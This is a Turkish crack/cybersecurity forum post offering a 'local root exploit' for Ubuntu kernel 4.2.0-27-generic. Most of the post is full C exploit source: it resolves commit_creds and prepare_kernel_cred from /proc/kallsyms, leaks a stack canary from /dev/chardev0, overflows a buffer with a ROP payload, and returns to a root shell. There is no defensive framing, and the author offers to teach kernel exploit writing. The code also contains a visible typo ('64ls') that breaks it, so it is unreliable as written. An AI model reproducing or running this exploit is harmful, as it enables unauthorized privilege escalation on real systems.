Menü
Neler yeni
Kullanıcı:
Filtreler
HerTürlüBilgi - WebmasterForum - CrackForum - CyberSecurity
MERHABA
Üye olmak için bugün ücretsiz bir hesap açın! Oturum açtıktan sonra, kendi konularınızı ve gönderilerinizi ekleyerek bu siteye katılabilecek ve kendi özel gelen kutunuz aracılığıyla diğer üyelerle bağlantı kurabileceksiniz!

Linux Ubuntu 4.2.0-27-generic Local root exploit

Tr0n

Tr0n

Legendary
legendary
Eğer istek olursa linux kernele exploit yazmak konusun paylaşırım
Exploiti yazdığım kernel no :
Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP 2016 i686 i686 i686 GNU/Linux
Exploit:
Python: 
//gcc -static -o exploit exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdint.h>
 
#define TEXT_LEN 64ls
 
struct trap_frame {
    void * eip ;        
    uint32_t cs ;      
    uint32_t eflags ;       
    void * esp ;       
    uint32_t ss ;       
} __attribute__((packed));
struct trap_frame tf;
 
void getShell(void) {
    execl("/bin/sh", "sh", NULL);
}
 
void prepare_tf(void) {
    asm("pushl %cs; popl tf+4;"
        "pushfl; popl tf+8;"
        "pushl %esp; popl tf+12;"
        "pushl %ss; popl tf+16;");
    tf.eip = &getShell ;
    tf.esp -= 1024;         
}
 
unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
 
void payload(void)
{
    commit_creds(prepare_kernel_cred(0));
    asm("mov $tf, %esp;"
        "iret ;");
}
 
unsigned long kallsym_getaddr(const char* str)
{
    FILE *stream;
    char fbuf[256];
    char addr[32];
 
    stream = fopen("/proc/kallsyms","r");
    if(stream < 0)
    {
        printf("failed to open /proc/kallsyms\n");
        return 0;
    }
 
    memset(fbuf,0x00,sizeof(fbuf));
 
    while(fgets(fbuf,256,stream) != NULL)
    {
        char *p = fbuf;
        char *a = addr;
 
        if(strlen(fbuf) == 0)
            continue;
 
        memset(addr,0x00,sizeof(addr));
        fbuf[strlen(fbuf)-1] = '\0';
 
        while(*p != ' ')
            *a++ = *p++;
 
        p+=3;
    if(!strcmp(p,str))
            return strtoul(addr, NULL, 16);
    }
    return 0;
}
 
int main()
{
    static char buf[128],rop[128];
    char canary[4];
    int fd,i,j;
 
    
    commit_creds = kallsym_getaddr("commit_creds");
    if(commit_creds == 0)
    {
        printf("failed to get commit_creds address\n");
        return 0;
    }
    printf("commit_creds address is :%p\n",commit_creds);
 

    prepare_kernel_cred = kallsym_getaddr("prepare_kernel_cred");
    if(prepare_kernel_cred == 0)
    {
        printf("failed to get prepare_kernel_cred address\n");
        return 0;
    }
    printf("prepare_kernel_cred address is :%p\n",prepare_kernel_cred);
 

    if ((fd = open("/dev/chardev0", O_RDWR)) < 0){
        printf("Cannot open /dev/chardev0. Try again later.\n");
    }
 
    lseek(fd, 32, SEEK_CUR);
    read(fd, buf, TEXT_LEN);
 
    for (i = 0; i < 4; i++)
    {
        for (j = 0; j < 16; j++) printf("%02x ", buf[i*16+j] & 0xff);
        printf(" | ");
        for (j = 0; j < 16; j++) printf("%c", buf[i*16+j] & 0xff);
        printf("\n");
    }
 
    memcpy(canary, buf+32,4);
    printf("canary is :");
    for(i = 0;i < 4;i++){
        printf("%02x ",canary[i] & 0xff);
    }
    printf("\n");
 

    memset(rop, 'A', 64);
    memcpy(rop+64, canary, 4);
    memset(rop+68, 'B', 16);
    *((void**)(rop+84)) = &payload;
 
    prepare_tf();
 
    
    write(fd, rop, 88);
    if (close(fd) != 0){
        printf("Cannot close.\n");
    }
    return 0;
}
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst